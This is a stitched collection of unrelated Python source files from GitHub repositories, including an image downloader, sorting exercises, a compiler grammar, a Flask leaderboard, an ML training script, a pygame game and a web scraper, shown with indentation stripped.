img_base_name = os.path.basename(img_url.replace(url_suffix, '').replace('?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240', ''))
print(f'下载图片:{img_base_name}')
img_name = img_base_name
if '.' in img_base_name:
# img_base_name = img_name[0:img_name.index('.')]
img_name = img_base_name
else:
# 没有图片后缀的话就加上jpg
img_name = img_base_name + '.png'
# img_name += '.png'
download_pics(img_url, filepath, img_name)
img_relative_path = os.path.join(os.path.basename(filepath).replace('.md', '.assets'), img_name)
print(f'替换图片链接:{img_url} with {img_relative_path}')
file_content = re.sub(f"!\\[.*?\\]\\((.*?){img_base_name}(.*?)\\)", f'{{% assets {img_base_name} %}}', file_content)
file_content = file_content.replace(f'{{% assets {img_base_name} %}}', f'')
updated_file_content = file_content
with open(filepath, 'w+', encoding='utf-8') as f:
print(f'改动写入文件:{filepath}')
f.write(updated_file_content)
def run(_path:str):
print('正在处理。')
# work_path = os.path.join('.', 'docs')
work_path = _path
pool = threadpool.ThreadPool(4)
args = []
for root, dirs, files in os.walk(work_path):
for filename in files:
if filename.endswith('md'):
filepath = os.path.abspath(os.path.join(root, filename))
args.append(filepath)
# download_and_replace_image(filepath)
tasks = threadpool.makeRequests(download_and_replace_image, args)
[pool.putRequest(task) for task in tasks]
print('=> 线程池开始运行')
pool.wait()
print('任务完成。')
if __name__ == '__main__':
run(sys.argv[1]) | JcobCN/JianshuMarkdownImg2Local | spider_new.py | spider_new.py | py | 3,099 | python | en | code | 2 | github-code | 13 |
71496992979 | # 손 코딩 연습 (5) - 병합정렬
# 병합정렬이란? 하나의 리스트를 두 개의 균등한 크기로 분할하고 분할된 부분 리스트를 정렬한 다음,
# 두 개의 정렬된 부분 리스트를 합하여 전체가 정렬된 리스트가 되게 하는 방법
# 시간 복잡도 - O(n + k) / k = max number of array
# 공간 복잡도 - O(k) / 병합할 결과를 담아 놓을 배열이 추가적으로 필요합니다.
def counting_sort(arr):
max_num = max(arr)
count = [0 for _ in range(max_num + 1)]
answer = [0 for _ in range(len(arr))]
for num in arr:
count[num] += 1
for i in range(1, max_num + 1):
count[i] = count[i] + count[i - 1]
for i in range(len(arr)):
count[arr[i]] -= 1
answer[count[arr[i]]] = arr[i]
return answer
print(counting_sort([1, 2, 4, 5, 5, 6, 2, 7, 7, 4, 10, 22, 2, 3, 4])) | eunseo-kim/Algorithm | Algorithm/06_계수정렬.py | 06_계수정렬.py | py | 892 | python | ko | code | 1 | github-code | 13 |
70835720658 | # ------------------------------------------------------------
# File: Operations.py
# Developed by: Erick Barrantes, Jessica Espinoza
# Project: FunSkills-Compiler
# version: 1
#
# Last modified 26 /10 /19
# Description: Grammar for mathematical operations
#
# TEC 2019 | CE3104 - Lenguajes, Compiladores e Interpretes
# -------------------------------------------------------------
import sys
import src.ide.globals as globals
funcList = []
variables = {}
precedence = (
('left', 'PLUS', 'MINUS'),
('left', 'TIMES', 'DIVIDE'),
('right', 'NEGATIVE'), # Unary minus operator
)
# Basic operations
def p_expression_plus(p):
'expression : expression PLUS term'
p[0] = p[1] + p[3]
def p_expression_minus(p):
'expression : expression MINUS term'
p[0] = p[1] - p[3]
def p_term_times(p):
'term : term MULT factor'
p[0] = p[1] * p[3]
def p_term_div(p):
'term : term DIVIDE factor'
p[0] = p[1] / p[3]
def p_expression_negative(p):
'expression : MINUS term %prec NEGATIVE'
p[0] = -p[2]
# Basic atomic expressions
def p_expression_term(p):
'expression : term'
p[0] = p[1]
def p_term_factor(p):
'term : factor'
p[0] = p[1]
def p_factor_num(p):
'factor : NUMBER'
p[0] = p[1]
def p_factor_ID(p):
'factor : ID'
try:
if isinstance(variables[p[1]][-1], int):
p[0] = variables[p[1]][-1]
else:
print("'" + p[1] + "'", "must be integer")
except KeyError:
print("Syntactic Error: Variable %s has not been declared." % p[1])
p[0] = 0
def p_factor_array(p):
'factor : ID LBRACKET NUMBER RBRACKET'
if variables[p[1]]:
arrayList = variables[p[1]][1]
if p[3] < len(arrayList):
value = arrayList[p[3]]
p[0] = value
else:
print("Index out of range")
else:
print("Syntactic Error: Variable %s has not been declared." % p[1])
def p_factor_expr(p):
'factor : LPAREN expression RPAREN'
p[0] = p[2]
def p_empty(p):
"empty :"
pass
# Error rule for syntax errors
def p_error(p):
if p:
error_message = "Syntax error in line: " + str(p.lineno)
file = open(globals.projectFolderPath + "/src/tmp/error_log.txt", "w")
file.write(error_message)
file.close()
raise SyntaxError
| ce-box/CE3104-Fun-Skills | Compiler/src/compiler/syntactic/Operations.py | Operations.py | py | 2,350 | python | en | code | 7 | github-code | 13 |
35028308580 | # 컵홀더
N = int(input())
seat = input()
i = cnt = 0
while i < N:
if seat[i] == 'S':
i += 1
cnt += 1
else:
i += 2
cnt += 1
if cnt + 1 > N:
print(N)
else:
print(cnt + 1)
| Jehyung-dev/Algorithm | 백준/Bronze/2810. 컵홀더/컵홀더.py | 컵홀더.py | py | 241 | python | en | code | 0 | github-code | 13 |
1581039461 | import bcrypt
import sys
import os.path
import sqlite3 as sql
from random import shuffle
import random
import json
from flask import Flask, url_for, redirect, render_template, request, session
from functools import wraps
app = Flask(__name__)
@app.route("/", methods=['GET', 'POST'])
def renderGamePage():
if request.method == 'POST':
username = request.form['username'];
score = request.form['score'];
print("Username: "+username+ ", Score: "+score);
try:
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
db_path = os.path.join(BASE_DIR, "database.db")
conn = sql.connect(db_path)
cur = conn.cursor()
print("Connected")
cur.execute("INSERT INTO leaderboard (username, score) VALUES (?,?)",(username, score))
conn.commit()
print("Upload Successful")
except:
conn.rollback()
print("Connection Failed")
return render_template('gameTemplate.html')
return render_template('gameTemplate.html')
@app.route('/leaderboard')
def showUserInfo():
try:
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
db_path = os.path.join(BASE_DIR, "database.db")
conn = sql.connect(db_path)
conn.row_factory = sql.Row
cur = conn.cursor()
print("Connected")
cur.execute("SELECT * FROM leaderboard ORDER BY score DESC")
rows = cur.fetchall();
conn.close
print("Selection Complete")
return render_template('leaderboardTemplate.html', rows = rows)
conn.close
print("Selection Complete")
except:
conn.rollback()
print("Connection Failed: Could not retrieve database")
return render_template('leaderboardTemplate.html')
@app.route('/instructions')
def showInstructions():
return render_template('instructionTemplate.html')
@app.errorhandler(404)
def page_not_found(error):
return "Bit broken still. Couldn't find the page you requested.", 404
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=True)
| RoanCreed7/set09103 | coursework/main.py | main.py | py | 2,176 | python | en | code | 0 | github-code | 13 |
10887831522 | import pandas as pd
import numpy as np
import pickle
import json
from flaml import AutoML
from dotenv import dotenv_values
from sklearn.model_selection import StratifiedKFold
def amex_metric_mod(y_true, y_pred):
labels = np.transpose(np.array([y_true, y_pred]))
labels = labels[labels[:, 1].argsort()[::-1]]
weights = np.where(labels[:,0]==0, 20, 1)
cut_vals = labels[np.cumsum(weights) <= int(0.04 * np.sum(weights))]
top_four = np.sum(cut_vals[:,0]) / np.sum(labels[:,0])
gini = [0,0]
for i in [1,0]:
labels = np.transpose(np.array([y_true, y_pred]))
labels = labels[labels[:, i].argsort()[::-1]]
weight = np.where(labels[:,0]==0, 20, 1)
weight_random = np.cumsum(weight / np.sum(weight))
total_pos = np.sum(labels[:, 0] * weight)
cum_pos_found = np.cumsum(labels[:, 0] * weight)
lorentz = cum_pos_found / total_pos
gini[i] = np.sum((lorentz - weight_random) * weight)
return 0.5 * (gini[1]/gini[0] + top_four)
if __name__ == "__main__":
config = dotenv_values('../.env')
# Part 1B: Extended Regression Model
print("Loading Extended Train FE Data")
train = pd.read_parquet(config["ENGINEERED_DATA"] + "extended_train_fe.parquet")
FEATURES = train.columns[1:-1]
SPLITS = 2
RANDOM_STATE = 6474
skf = StratifiedKFold(n_splits=SPLITS, random_state=RANDOM_STATE, shuffle=True)
for fold,(train_idx, valid_idx) in enumerate(skf.split(
train, train.target)):
X_train = train.loc[train_idx,FEATURES]
y_train = train.loc[train_idx,"target"]
print(f"Training Extended Regression Model Fold {fold+1}")
automl = AutoML()
automl.fit(X_train, y_train, task="regression", time_budget=3600)
print('Best Extended Regression ML learner:', automl.best_estimator)
print('Best hyperparmeter config:', automl.best_config)
print('Best loss on validation data: {0:.4g}'.format(automl.best_loss))
print('Training duration of best run: {0:.4g} s'.format(automl.best_config_train_time))
print("Dumping hyperparameter json")
with open(f"{automl.best_estimator}_FOLD_{fold+1}_extended_regression_fe.json", "w") as fp:
model = {automl.best_estimator : automl.best_config}
json.dump(model, fp)
print("Saving Model")
ext_reg_path = config["FLAML_MODELS"] + f'extended_regression_fe_FOLD_{fold+1}_{(automl.best_loss):.4g}.pkl'
with open(ext_reg_path, 'wb') as f:
pickle.dump(automl, f, pickle.HIGHEST_PROTOCOL)
import sys
sys.exit()
# Part 1C: Load and predict
print("Load and predict test data")
del train, X_train, y_train
test = pd.read_parquet(config["ENGINEERED_DATA"] + "test_fe.parquet")
test = test.drop("customer_ID", axis=1)
with open(ext_reg_path, 'rb') as f:
automl = pickle.load(f)
sub = automl.predict(test)
labels = pd.read_csv(config["SAMPLE_PATH"])
labels["prediction"] = sub
print("Saving Extended Regression Submission")
labels.to_csv(config["SUBMISSION_FOLDER"] + "flaml_extended_regression_fe_submission.csv", index=False)
del labels, sub | Dael-the-Mailman/ML-Capstone-Project | models/FLAML_Model_5_Train.py | FLAML_Model_5_Train.py | py | 3,259 | python | en | code | 0 | github-code | 13 |
23058497116 | from tkinter import *
from tkinter.scrolledtext import *
import Lexer as lexer
from idlelib.percolator import Percolator
import idlelib.colorizer as ic
import LL1ParserExcep as LL1
def verificar_codigo(event=None):
# Habilitar la edición de la consola
output_window.config(state=NORMAL)
output_window.delete(1.0, END)
output_window.config(state=DISABLED)
texto = text.get("1.0", END) # Obtiene el texto del campo de entrada
palabras = texto.split() # Divide el texto en palabras
if not (palabras == []):
result, error = lexer.run('archivo.txt', texto)
if error:
# Habilitar la edición de la consola programáticamente
output_window.config(state=NORMAL)
output_window.delete(1.0, END)
output_window.insert(1.0, error.as_string())
output_window.config(state=DISABLED)
def run(event=None):
filetxt = text.get("1.0", END) # Obtiene el texto del campo de entrada
if filetxt != '\n':
result, error = lexer.run('archivo.txt', filetxt)
parse = []
if error:
# Habilitar la edición de la consola programáticamente
output_window.config(state=NORMAL)
output_window.delete(1.0, END)
output_window.insert(1.0, error.as_string())
output_window.config(state=DISABLED)
else:
#print(result)
out = ''
for token in result:
if token.type != lexer.TT_EOF: parse.append(token)
if token.type == ';':
out += " "+token.type + "\n"
elif token.type == 'KEYWORD':
out += "\n"+token.type+": "+token.value+"\n"
else:
out += " "+token.type
#print(out)
if error:
# Habilitar la edición de la consola programáticamente
output_window.config(state=NORMAL)
output_window.delete(1.0, END)
output_window.insert(1.0, error.as_string())
output_window.config(state=DISABLED)
else:
parse.append(lexer.Token(type_='PARSE',value_="$"))
#print(parse)
parser = LL1.Parser()
parser.main(parse)
error = parser.algorithm()
if error:
# Habilitar la edición de la consola programáticamente
output_window.config(state=NORMAL)
output_window.delete(1.0, END)
output_window.insert(1.0, error.as_string())
output_window.config(state=DISABLED)
else:
# Habilitar la edición de la consola programáticamente
output_window.config(state=NORMAL)
output_window.delete(1.0, END)
output_window.insert(1.0, "Sintaxis valida")
output_window.config(state=DISABLED)
else:
# Habilitar la edición de la consola programáticamente
output_window.config(state=NORMAL)
output_window.delete(1.0, END)
output_window.insert(1.0, "Texto Vacio")
output_window.config(state=DISABLED)
window = Tk()
window.geometry("1000x800")
window.title("Analizador Léxico")
# create and configure menu
menu = Menu(window)
window.config(menu=menu)
# create input frame
input_frame = Frame(window)
input_frame.pack(fill=BOTH, side=TOP, padx=15, pady=20)
# Title Label
title_label = Label(input_frame, text = "Compiler", font=("Arial Bold", 20), fg = "#2B3239")
title_label.pack(side=TOP, padx=25, pady=15)
# create input_window window for writing code
input_window = ScrolledText(input_frame, font=("Arial", 10), wrap=None)
input_window.pack(padx = 10, side=LEFT, fill=BOTH, expand=True)
# Área de texto para ingresar el código
text = ScrolledText(input_window, font=("Arial", 10))
text.pack(fill=BOTH, side=LEFT,expand=True) # Rellena y expande el widget de texto
Percolator(text).insertfilter(ic.ColorDelegator())
text.bind('<KeyRelease>', verificar_codigo) # Asocia la función verificar_texto al evento de liberación de tecla
# create output frames
output_frame = Frame(window)
output_frame.pack(fill=X,side=BOTTOM, padx=15, pady=20, expand=False)
# Title Label
output_label = Label(output_frame, text = "Console", font=("Arial Bold", 14), fg = "#2B3239")
output_label.pack(side=TOP, padx=20, pady=15)
# create output window to display output of written code
output_window = ScrolledText(output_frame,state=DISABLED,font=("Arial Bold", 15), height=10)
output_window.pack(padx = 10, pady = 10, side=BOTTOM, fill=BOTH, expand=1)
output_window.config(fg="red")
# create menus
file_menu = Menu(menu, tearoff=0)
edit_menu = Menu(menu, tearoff=0)
run_menu = Menu(menu, tearoff=0)
view_menu = Menu(menu, tearoff=0)
theme_menu = Menu(menu, tearoff=0)
# function for light mode window
def light():
window.config(bg="#CFDCE7")
title_label.config(fg="#2B3239",bg="#CFDCE7")
input_frame.config(bg="#CFDCE7")
input_window.config(fg="#2B3239", bg="white")
#OUTPUT
output_label.config(fg="#2B3239", bg="#CFDCE7")
output_frame.config( bg="#CFDCE7")
output_window.config(fg="#2B3239", bg="white")
#status_bars.config(fg="#2B3239",bg="#CFDCE7")
# function for dark mode window
def dark():
window.config(bg="#183A59")
title_label.config(fg="white",bg="#183A59")
input_frame.config(bg="white")
input_window.config(fg="white", bg="black")
#OUTPUT
output_label.config(fg="white", bg="#183A59")
output_frame.config(bg="#183A59")
output_window.config(fg="red", bg="black")
# add commands to change themes
theme_menu.add_command(label="light", command=light)
theme_menu.add_command(label="dark", command=dark)
# add menu labels
menu.add_cascade(label="Archivo", menu=file_menu)
menu.add_cascade(label="Editar", menu=edit_menu)
menu.add_cascade(label="Ejecutar", menu=run_menu)
menu.add_cascade(label="Ver", menu=view_menu)
menu.add_cascade(label="Tema", menu=theme_menu)
run_menu.add_command(label="Ejecutar", accelerator="F5", command=run)
# Ejecutar la window principal de Tkinter
window.mainloop() | LUCASSANCHEZ12/My_own_Programming_Language | IDE.py | IDE.py | py | 6,263 | python | es | code | 0 | github-code | 13 |
41891364652 | import sys
from glob import glob
import re
files = glob(sys.argv[1])
for path in files:
outpath = path + '.out'
vb = 'Metrics for Query: 1\
Count: 256 times executed in whole run\
AQET: 0.006403 seconds (arithmetic mean)\
AQET(geom.): 0.006140 seconds (geometric mean)\
QPS: 593.01 Queries per second\
minQET/maxQET: 0.00397338s / 0.02531122s\
Average result count: 0.00\
min/max result count: 0 / 0\
Number of timeouts: 0'
allValues = {}
resultList = []
with open(path, 'r') as inf:
content = inf.read()
matches = re.findall('Metrics for Query:[\s\S]*?Number of timeouts:\s+\d+\n', content)
for match in matches:
resultValue = {}
lines = match.split('\n')
for line in lines:
if(line != ''):
duo = line.split(':')
allValues[duo[0]] = duo[0]
resultValue[duo[0]] = re.findall('^[\d\s\./s]*', duo[1].strip())[0].strip()
resultList.append(resultValue)
with open(outpath, 'w+') as outf:
outf.write('\t'.join(allValues) + '\n')
with open(outpath, 'a') as outf:
for result in resultList:
rowValue = ''
for value in allValues:
if value in result:
rowValue = rowValue + result[value]
rowValue = rowValue + '\t'
outf.write(rowValue + '\n')
| LinkedDataFragments/Availability-Performance-Benchmark | evaluation/parsebsbm.py | parsebsbm.py | py | 1,564 | python | en | code | 0 | github-code | 13 |
32564895241 | # For information about initializing game buttons, see button py
import pygame.ftfont # The module can render text to the screen
class Button:
# message is the text we want to display in the button
def __init__(self, ai_settings, screen, message):
"""Initialize button properties"""
self.screen = screen
self.screen_rect = screen.get_rect()
# Set the size and other properties of the button
self.width, self.height = 200, 50
self.button_color = (0, 255, 0) # The button is set to green
self.text_color = (255, 255, 255) # The text content is set to white
self.font = pygame.font.SysFont(None, 48) # None indicates the default font and 48 indicates the font size
# Create a rect object for the button and center it
self.rect = pygame.Rect(0, 0, self.width, self.height)
self.rect.center = self.screen_rect.center
# Create a label for the button
self.prep_msg(message)
def prep_msg(self, message):
"""take message Render as an image and center it in the button"""
self.msg_image = self.font.render(message, True, self.text_color,
self.button_color) # Convert text to image
self.msg_image_rect = self.msg_image.get_rect()
self.msg_image_rect.center = self.rect.center
def draw_button(self):
"""Draw a button before you draw text"""
self.screen.fill(self.button_color, self.rect) # Draw button
self.screen.blit(self.msg_image, self.msg_image_rect) # Draw text | neetiachar/Alien-Invasion-Project | prj_files/button.py | button.py | py | 1,591 | python | en | code | 0 | github-code | 13 |
1527917536 | #
# @lc app=leetcode id=3 lang=python3
#
# [3] Longest Substring Without Repeating Characters
#
# @lc code=start
class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
if len(s)==0 or len(s)==1:
return len(s)
windStart=0;windEnd=0;windHash={s[0]:0}
currLen=1;maxLen=1
for index in range(1,len(s)):
ch=s[index]
if ch not in windHash.keys():
windEnd+=1;currLen+=1;maxLen=max(maxLen,currLen)
windHash[ch]=index
else:
pos=windHash[ch]
chars=[i for i in s[windStart:pos+1]]
popFromHash(windHash, chars)
windStart=pos+1;windEnd=index
currLen=windEnd-windStart+1
maxLen=max(maxLen,currLen)
windHash[ch]=index
return maxLen
def popFromHash(ht,keys):
for key in keys:
ht.pop(key)
# @lc code=end
| stuntmartial/DSA | Leetcode/3.longest-substring-without-repeating-characters.py | 3.longest-substring-without-repeating-characters.py | py | 972 | python | en | code | 0 | github-code | 13 |
23296099620 | """
This script introduces the 'Complex' class that is fulling the Database object
A Complex takes as input a pdb, a mrc and some extra selection tools and outputs a grid aligned with the mrc.
It makes the conversion from (n,3+features) matrices to the grid format.
"""
import os
import sys
import time
import numpy as np
from sklearn.gaussian_process.kernels import RBF
if __name__ == '__main__':
script_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(script_dir, '..'))
from utils import mrc_utils, pymol_utils
from utils.rotation import Rotor
def just_one(coord, xi, yi, zi, sigma, feature, total_grid, use_multiprocessing=False):
"""
:param coord: x,y,z
:param xi: a range of x coordinates
:param yi: a range of x coordinates
:param zi: a range of x coordinates
:param feature: The feature to put around this given point
:param sigma: The scale of RBF
:param total_grid: The grid to add to
:param use_multiprocessing: If this is to be used in a multiprocessing setting
:return:
"""
# Find subgrid
nx, ny, nz = xi.size, yi.size, zi.size
bound = int(4 * sigma)
x, y, z = coord
binx = np.digitize(x, xi)
biny = np.digitize(y, yi)
binz = np.digitize(z, zi)
min_bounds_x, max_bounds_x = max(0, binx - bound), min(nx, binx + bound)
min_bounds_y, max_bounds_y = max(0, biny - bound), min(ny, biny + bound)
min_bounds_z, max_bounds_z = max(0, binz - bound), min(nz, binz + bound)
X, Y, Z = np.meshgrid(xi[min_bounds_x: max_bounds_x],
yi[min_bounds_y: max_bounds_y],
zi[min_bounds_z:max_bounds_z],
indexing='ij')
X, Y, Z = X.flatten(), Y.flatten(), Z.flatten()
# Compute RBF
rbf = RBF(sigma)
subgrid = rbf(coord, np.c_[X, Y, Z])
subgrid = subgrid.reshape((max_bounds_x - min_bounds_x,
max_bounds_y - min_bounds_y,
max_bounds_z - min_bounds_z))
# Broadcast the feature throughout the local grid.
subgrid = subgrid[None, ...]
feature = feature[:, None, None, None]
subgrid_feature = subgrid * feature
# Add on the first grid
if not use_multiprocessing:
total_grid[:,
min_bounds_x: max_bounds_x,
min_bounds_y: max_bounds_y,
min_bounds_z:max_bounds_z] += subgrid_feature
else:
return min_bounds_x, max_bounds_x, min_bounds_y, max_bounds_y, min_bounds_z, max_bounds_z, subgrid_feature
def fill_grid_from_coords(coords, bins, features=None, sigma=1.):
"""
Generate a grid from the coordinates
:param coords: (n,3) array
:param bins: 3 arrays of bins. They can originate from raw coords or from another mrc.
:param features: (n,k) array or None
:param sigma:
:return:
"""
xi, yi, zi = bins
nx, ny, nz = xi.size, yi.size, zi.size
features = np.ones((len(coords), 1)) if features is None else features
feature_len = features.shape[1]
total_grid = np.zeros(shape=(feature_len, nx, ny, nz))
for i, coord in enumerate(coords):
just_one(coord, feature=features[i], xi=xi, yi=yi, zi=zi, sigma=sigma, total_grid=total_grid)
return total_grid.astype(np.float32)
def get_bins(coords, spacing, padding, xyz_min=None, xyz_max=None):
"""
Compute the 3D bins from the coordinates
"""
if xyz_min is None:
xm, ym, zm = coords.min(axis=0) - padding
else:
xm, ym, zm = xyz_min - padding
if xyz_max is None:
xM, yM, zM = coords.max(axis=0) + padding
else:
xM, yM, zM = xyz_max + padding
xi = np.arange(xm, xM, spacing)
yi = np.arange(ym, yM, spacing)
zi = np.arange(zm, zM, spacing)
return xi, yi, zi
def build_grid_from_coords(coords, features=None, spacing=2., padding=0, xyz_min=None, xyz_max=None, sigma=1.):
"""
Generate a grid from the coordinates
:param coords: (n,3) array
:param features: (n,k) array or None
:param spacing:
:param padding:
:param xyz_min:
:param xyz_max:
:param sigma:
:return:
"""
return fill_grid_from_coords(coords=coords,
features=features,
bins=get_bins(coords, spacing, padding, xyz_min, xyz_max),
sigma=sigma)
class GridComplex:
"""
Object containing a protein and a density
The main difficulty arises from the creation of the grid for the output,
because we need those to align with the input mrc
"""
def __init__(self, mrc_path, pdb_path, antibody_selection=None, return_sdf=False, rotate=True):
# First get the MRC data
self.mrc = mrc_utils.MRCGrid.from_mrc(mrc_path)
self.rotor = Rotor() if rotate else Rotor(0, 0)
self.target_tensor = self.get_target_grid(pdb_path=pdb_path,
antibody_selection=antibody_selection,
return_sdf=return_sdf)
self.input_tensor = self.mrc.data[None, ...]
self.input_tensor, self.target_tensor = Rotor().rotate_tensors([self.input_tensor, self.target_tensor])
def get_target_grid(self, pdb_path, antibody_selection=None, return_sdf=False):
# Get the corresponding empty grid, this follows 'resample' with origin offset
bins = [np.arange(start=self.mrc.origin[i],
stop=(self.mrc.origin + self.mrc.data.shape * self.mrc.voxel_size)[i],
step=self.mrc.voxel_size[i])
for i in range(3)]
# Now let's get the relevant coordinates to embed in this grid
antibody_coords = pymol_utils.get_protein_coords(pdb_path=pdb_path,
pymol_selection=antibody_selection)
antigen_coords = pymol_utils.get_protein_coords(pdb_path=pdb_path,
pymol_selection=f"not ({antibody_selection})")
# Get the corresponding grid
antibody_grid = fill_grid_from_coords(coords=antibody_coords, bins=bins)
antigen_grid = fill_grid_from_coords(coords=antigen_coords, bins=bins)
antibody_grid = np.tanh(antibody_grid)
antigen_grid = np.tanh(antigen_grid)
void_grid = np.maximum(0, 1 - antibody_grid - antigen_grid)
target_tensor = np.concatenate((antibody_grid, antigen_grid, void_grid))
if return_sdf:
antibody_dists = self.sdf(antibody_grid)[None, ...]
antigen_dists = self.sdf(antigen_grid)[None, ...]
target_tensor = np.concatenate((target_tensor, antibody_dists, antigen_dists), axis=0)
self.target_tensor = target_tensor
return target_tensor
@staticmethod
def sdf(grid):
"""
Compute a signed distance function of the isolevel pseudo surface defined
as pixels comprised between 0.05 and 0.15
:param grid:
:return:
"""
import scipy
grid = np.squeeze(grid)
filter_array = np.logical_or(grid < 0.05, grid > 0.15)
distances_to_surf = scipy.ndimage.distance_transform_edt(filter_array)
target_distance = np.tanh(distances_to_surf / 3) # 6A is the right size ?
sdf = np.sign(grid - 0.1) * target_distance
return sdf.astype(np.float32)
if __name__ == '__main__':
datadir_name = "../data/pdb_em"
dirname = '7LO8_23464'
pdb_name, mrc_name = dirname.split("_")
pdb_path = os.path.join(datadir_name, dirname, f"{pdb_name}.cif")
mrc_path = os.path.join(datadir_name, dirname, "resampled_0_2.mrc")
comp = GridComplex(mrc_path=mrc_path,
pdb_path=pdb_path,
antibody_selection='chain H or chain L',
return_sdf=False,
# return_sdf=True,
)
# We get the right grid supervision :
target = comp.target_tensor
# comp.mrc.save(outname=os.path.join(datadir_name, dirname, "antibody.mrc"), data=target[0], overwrite=True)
# comp.mrc.save(outname=os.path.join(datadir_name, dirname, "antigen.mrc"), data=target[1], overwrite=True)
# comp.mrc.save(outname=os.path.join(datadir_name, dirname, "void.mrc"), data=target[2], overwrite=True)
# We get the right SDF supervision :
array = GridComplex.sdf(target[0])
# comp.mrc.save(outname=os.path.join(datadir_name, dirname, "thresh.mrc"), data=array, overwrite=True)
| Vincentx15/crIA-EM | load_data/GridComplex.py | GridComplex.py | py | 8,567 | python | en | code | 0 | github-code | 13 |
74023195539 | import pygame
from scripts import constants, globals
from scripts.player import Player
class Hud(pygame.sprite.Sprite):
def __init__(self):
self.hp = HPBar()
self.ammo = AmmoBar()
self.wpn = WeaponName()
self.msg = Message()
def update(self):
self.hp.update()
self.ammo.update()
self.wpn.update()
self.msg.update()
def set_player(self, player: Player):
self.hp.player = player
self.ammo.player = player
self.wpn.player = player
class HPBar(pygame.sprite.Sprite):
def __init__(self):
self.player = None
self.font = pygame.font.Font("assets/fonts/BULKYPIX.TTF", 16)
self.text = self.update_counter()
self.rect = self.text.get_rect()
self.text.set_colorkey((0,0,0))
self.rect.bottomleft = (8, constants.SCREEN_HEIGHT)
def update(self):
self.text = self.update_counter()
def update_counter(self) -> pygame.Surface:
try:
return self.font.render("Health: " + str(self.player.hp), True, (255,255,255))
except AttributeError:
return self.font.render("", True, (255,255,255))
class AmmoBar(pygame.sprite.Sprite):
def __init__(self):
self.player = None
self.font = pygame.font.Font("assets/fonts/BULKYPIX.TTF", 16)
self.text = self.font.render("", False, (255,255,255))
self.rect = self.text.get_rect()
self.text.set_colorkey((0,0,0))
self.rect.bottomleft = (constants.SCREEN_WIDTH - 120, constants.SCREEN_HEIGHT)
def update(self):
try:
if self.player.equipped_weapon.ammo_consumption < 1:
ammocounter = 'INF'
else:
ammocounter = str(self.player.equipped_weapon.ammo)
self.text = self.font.render("Ammo: " + ammocounter, True, (255,255,255))
except AttributeError:
pass
class WeaponName(pygame.sprite.Sprite):
def __init__(self):
self.player = None
self.font = pygame.font.Font("assets/fonts/BULKYPIX.TTF", 12)
self.text = self.font.render("", False, (255,255,255))
self.rect = self.text.get_rect()
self.text.set_colorkey((0,0,0))
self.rect.bottomleft = (constants.SCREEN_WIDTH - 120, constants.SCREEN_HEIGHT - 20)
def update(self):
try:
self.text = self.font.render(self.player.equipped_weapon.name, True, (255,255,255))
except AttributeError:
pass
class Message(pygame.sprite.Sprite):
def __init__(self):
self.font = pygame.font.Font("assets/fonts/BULKYPIX.TTF", 12)
self.text = self.font.render("", False, (255,255,255))
self.rect = self.text.get_rect()
self.text.set_colorkey((0,0,0))
self.rect.bottomleft = (16, 16)
self.message_duration = 120
self.message_counter = 120
def show_message(self, message: str):
self.text = self.font.render(message, False, (255,255,255))
self.message_counter = 0
def update(self):
if self.message_counter >= self.message_duration:
self.text = self.font.render("", False, (255,255,255))
else:
self.message_counter += 1 | donqnr/unnamed-pygame-platformer | scripts/ui.py | ui.py | py | 3,236 | python | en | code | 1 | github-code | 13 |
38425356332 | from service.worker_service import Worker
from threading import Thread, Lock, Event
from module import helper
from time import sleep
class Manager(Thread):
def __init__(self, rabbitmq_pool, proxy_pool, credential_pool):
super().__init__()
self.index = 0
self.rabbitmq_pool = rabbitmq_pool
self.proxy_pool = proxy_pool
self.credential_pool = credential_pool
self.worker_pool = dict()
self.lock = Lock()
self.stop_event = Event()
def add_new_worker(self):
name = helper.generate_name(prefix=f"worker", exist_name=self.worker_pool.keys())
self.index += 1
worker = Worker(name=name, rabbitmq_pool=self.rabbitmq_pool)
worker.start()
self.lock.acquire()
self.worker_pool[name] = worker
self.lock.release()
def get_active_worker(self, typ3):
for name, worker in self.worker_pool[typ3].items():
if not worker.is_alive():
return worker
else:
return None
def reset_worker(self, worker):
name = worker.name
self.lock.acquire()
worker = self.worker_pool.pop(name)
self.lock.release()
worker.stop()
del worker
self.add_new_worker()
def stop(self):
self.stop_event.set()
def run(self):
print(f"Manager is started...")
while True:
if self.stop_event.is_set():
print("Manager is stopped!!!")
break
sleep(3600)
self.proxy_pool.save()
self.credential_pool.save()
| t4iv0i/multiplatform_crawler | service/manager_service.py | manager_service.py | py | 1,612 | python | en | code | 1 | github-code | 13 |
25685898222 | from sys import argv
from db.client import DbClient
if __name__ == "__main__":
if len(argv) > 1 and argv[1].lower().strip() == "--new":
dbc = DbClient(new=True)
else:
dbc = DbClient()
for spider in dbc.spiders:
p = spider.provider
dbc.combos_to_csv(1, dbc.missing(p), f'{p}Input')
| HartBlanc/CardRates | src/createCSV.py | createCSV.py | py | 329 | python | en | code | 1 | github-code | 13 |
21538173674 | # stupid addition takes two values(x, y)
# if x is str and y is str
# change both value to int and sum
# if x is int and y is int
# change both value to string and concatenate
# else return none
def stupid_addition(x, y):
if isinstance(x, str) and isinstance(y, str):
return int(x) + int(y)
elif isinstance(x, int) and isinstance(y, int):
return str(x) + str(y)
else:
return "none"
print("1 and 2 string", stupid_addition("1", "2"))
print("1 and 2 int", stupid_addition(1, 2))
print("1 and 2 different", stupid_addition("1", 2))
| Mark-McAdam/cs_lambda | Intro-Python-I/stupid_addition.py | stupid_addition.py | py | 597 | python | en | code | 0 | github-code | 13 |
4000541135 | import json
from bs4 import BeautifulSoup
import requests
import re
import sys
from nltk import sent_tokenize
from nltk.tokenize.punkt import PunktSentenceTokenizer, PunktParameters
import pprint
import dimensions
import repository
pp = pprint.PrettyPrinter(indent=4)
DictQuote={}
final_quote=""
final_image=""
punctuation = [".", "!", "?", ")", "]", "\"", "'", u"\u201D", u"\u201C", u"\u0027", u"\u2018", u"\u2019",]
prefixes = ['dr', 'vs', 'mr', 'mrs','ms' ,'prof', 'inc','jr','i.e']
"""
emotive= ['feel', 'chill', 'fire', 'burn', 'feel the fire']
s='feel the fire'
for word in emotive:
if word in s:
score +=1
"""
def parse(argv):
found_text=0
text=""
r = requests.get(argv)
data = r.text
soup = BeautifulSoup(data,from_encoding='utf8')
paras = soup.find_all('p')
